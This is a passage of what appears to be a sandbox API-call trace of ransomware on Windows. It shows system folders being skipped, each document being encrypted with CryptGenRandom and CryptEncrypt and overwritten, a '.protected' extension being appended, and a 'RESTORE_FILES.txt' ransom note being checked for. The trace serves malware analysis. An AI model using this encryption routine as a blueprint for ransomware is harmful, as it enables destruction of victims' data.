nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2478, lpOverlapped=0x0) returned 1 [0091.402] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffdb88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.402] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2478, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2478, lpOverlapped=0x0) returned 1 [0091.403] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.403] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, 
lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.403] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.403] CloseHandle (hObject=0xd4) returned 1 [0091.403] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx.protected") returned 77 [0091.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\qt1iqkpemb_p.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\qt1IqkPEmb_p.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\qt1iqkpemb_p.xlsx.protected")) returned 1 [0091.405] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="Windows") returned -1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="Program Files") returned 1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="Program Files (x86)") returned 1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="$Recycle.bin") returned 1 [0091.405] lstrcmpiW (lpString1="S25mweNwZUri.odp", lpString2="System Volume Information") returned -1 [0091.405] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp") returned 66 [0091.405] StrStrIW (lpFirst="S25mweNwZUri.odp", lpSrch=".protected") returned 0x0 [0091.405] lstrcmpW (lpString1="S25mweNwZUri.odp", lpString2="RESTORE_FILES.txt") returned 1 [0091.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) 
returned 1 [0091.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\s25mwenwzuri.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp") returned 66 [0091.406] StrStrW (lpFirst="S25mweNwZUri.odp", lpSrch=".txt") returned 0x0 [0091.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp") returned 66 [0091.406] StrStrW (lpFirst="S25mweNwZUri.odp", lpSrch=".rar") returned 0x0 [0091.406] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp") returned 66 [0091.406] StrStrW (lpFirst="S25mweNwZUri.odp", lpSrch=".zip") returned 0x0 [0091.406] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.406] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.406] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.407] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.407] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.407] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.407] CloseHandle (hObject=0xd4) returned 1 [0091.408] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp.protected") returned 76 [0091.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\s25mwenwzuri.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\s25mwenwzuri.odp.protected")) returned 1 [0091.409] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="Windows") returned -1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="Program Files") returned 1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="Program Files (x86)") returned 1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="$Recycle.bin") returned 1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="System Volume Information") returned 1 [0091.409] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt") returned 71 [0091.409] StrStrIW (lpFirst="TPEJ8KHRhlgmnzOZN.odt", lpSrch=".protected") returned 0x0 [0091.409] lstrcmpW (lpString1="TPEJ8KHRhlgmnzOZN.odt", 
lpString2="RESTORE_FILES.txt") returned 1 [0091.409] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.409] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\tpej8khrhlgmnzozn.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt") returned 71 [0091.410] StrStrW (lpFirst="TPEJ8KHRhlgmnzOZN.odt", lpSrch=".txt") returned 0x0 [0091.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt") returned 71 [0091.410] StrStrW (lpFirst="TPEJ8KHRhlgmnzOZN.odt", lpSrch=".rar") returned 0x0 [0091.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt") returned 71 [0091.410] StrStrW (lpFirst="TPEJ8KHRhlgmnzOZN.odt", lpSrch=".zip") returned 0x0 [0091.410] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.410] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.410] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.411] 
SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.411] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.411] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.411] CloseHandle (hObject=0xd4) returned 1 [0091.412] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt.protected") returned 81 [0091.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\tpej8khrhlgmnzozn.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\tpej8khrhlgmnzozn.odt.protected")) returned 1 [0091.412] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="Windows") returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="Program Files") returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="Program Files (x86)") returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="$Recycle.bin") returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="System Volume Information") returned 1 [0091.412] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc") returned 64 [0091.412] StrStrIW (lpFirst="yW3bzbRH1n.doc", lpSrch=".protected") returned 0x0 [0091.413] lstrcmpW (lpString1="yW3bzbRH1n.doc", lpString2="RESTORE_FILES.txt") returned 1 [0091.413] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.413] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\yw3bzbrh1n.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.413] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc") returned 64 [0091.413] StrStrW (lpFirst="yW3bzbRH1n.doc", lpSrch=".txt") returned 0x0 [0091.413] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc") returned 64 [0091.413] StrStrW (lpFirst="yW3bzbRH1n.doc", lpSrch=".rar") returned 0x0 [0091.413] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc") returned 64 [0091.413] StrStrW (lpFirst="yW3bzbRH1n.doc", lpSrch=".zip") returned 0x0 [0091.413] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.414] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.414] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.414] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.414] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.415] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.415] CloseHandle (hObject=0xd4) returned 1 [0091.415] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc.protected") returned 74 [0091.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\yw3bzbrh1n.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\yw3bzbrh1n.doc.protected")) returned 1 [0091.416] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="Windows") returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="Program Files") returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="Program Files (x86)") returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="$Recycle.bin") returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="System Volume Information") returned 1 [0091.416] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf") returned 63 [0091.416] StrStrIW (lpFirst="zGHCewHAV.pdf", lpSrch=".protected") returned 0x0 [0091.416] lstrcmpW (lpString1="zGHCewHAV.pdf", lpString2="RESTORE_FILES.txt") returned 1 [0091.416] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.416] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zghcewhav.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.417] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf") returned 63 [0091.417] StrStrW (lpFirst="zGHCewHAV.pdf", lpSrch=".txt") returned 0x0 [0091.417] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf") returned 63 [0091.417] StrStrW (lpFirst="zGHCewHAV.pdf", lpSrch=".rar") returned 0x0 [0091.417] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf") returned 63 [0091.417] StrStrW (lpFirst="zGHCewHAV.pdf", lpSrch=".zip") returned 0x0 [0091.417] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.418] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.418] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, 
nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.418] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.418] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.418] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.418] CloseHandle (hObject=0xd4) returned 1 [0091.419] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf.protected") returned 73 [0091.419] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zghcewhav.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zghcewhav.pdf.protected")) returned 1 [0091.420] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="Windows") returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="Program Files") returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="Program Files (x86)") returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="$Recycle.bin") returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", 
lpString2="System Volume Information") returned 1 [0091.420] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt") returned 73 [0091.420] StrStrIW (lpFirst="zhrHxZes7Pua0IN-sRy.odt", lpSrch=".protected") returned 0x0 [0091.420] lstrcmpW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="RESTORE_FILES.txt") returned 1 [0091.420] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.420] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zhrhxzes7pua0in-sry.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt") returned 73 [0091.420] StrStrW (lpFirst="zhrHxZes7Pua0IN-sRy.odt", lpSrch=".txt") returned 0x0 [0091.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt") returned 73 [0091.420] StrStrW (lpFirst="zhrHxZes7Pua0IN-sRy.odt", lpSrch=".rar") returned 0x0 [0091.421] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt") returned 73 [0091.421] StrStrW (lpFirst="zhrHxZes7Pua0IN-sRy.odt", lpSrch=".zip") returned 0x0 [0091.421] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.421] SetFilePointerEx 
(in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.421] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.422] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.422] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.422] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.422] CloseHandle (hObject=0xd4) returned 1 [0091.423] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt.protected") returned 83 [0091.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zhrhxzes7pua0in-sry.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zhrhxzes7pua0in-sry.odt.protected")) returned 1 [0091.424] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.424] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.424] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
